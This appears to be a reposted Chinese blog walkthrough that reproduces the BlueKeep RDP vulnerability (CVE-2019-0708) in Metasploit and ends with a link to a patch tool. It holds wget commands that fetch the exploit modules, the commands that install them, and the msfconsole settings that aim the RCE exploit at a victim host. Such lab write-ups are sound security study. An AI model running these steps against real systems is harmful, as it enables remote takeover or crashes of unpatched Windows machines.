码迷,mamicode.com
首页 > 其他好文 > 详细

CVE 2019-0708漏洞复现防御修复

时间:2019-09-07 16:03:24      阅读:138      评论:0      收藏:0      [点我收藏+]

标签:str   ora   直接   用户   2008R2   msf   line   社区   2008 r2   

CVE-2019-0708

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

就在今天微软官方发布了exp

影响范围

 

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows 2003
  • Windows XP

首先更新我们的kaili

apt-get  install metasploit-framework

更新完成后

打开msfconsole 并未有利用程序只有检测工具

技术图片

 

下载 exp

网盘:链接: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ 提取码: vh8h 

wget 下载
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

把下载的文件

依次执行命令创建利用文件夹

mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/
mkdir  -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mkdir  -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp rdp.rb   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp cve_2019_0708_bluekeep_rce.rb   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

重新打开msfconsole

重新加载

reload_all

技术图片

 

 我们导入

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

技术图片

 

 这个exp 目前只有 windwos 7  /2008r2  而且是社区阉割版容易蓝屏

set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接

技术图片

 

 当然也可以选其他的

show targets

直接run 

技术图片

 

 之前复现过一次在复现就一执行就蓝屏 放一张朋友成功的

技术图片

 

 而我的

技术图片

 

 

漏洞修复

http://weishi.360.cn/mianyigongju.html

前往这个地址进行漏洞修复

技术图片

 

 技术图片

 

CVE 2019-0708漏洞复现防御修复

标签:str   ora   直接   用户   2008R2   msf   line   社区   2008 r2   

原文地址:https://www.cnblogs.com/feizianquan/p/11481294.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!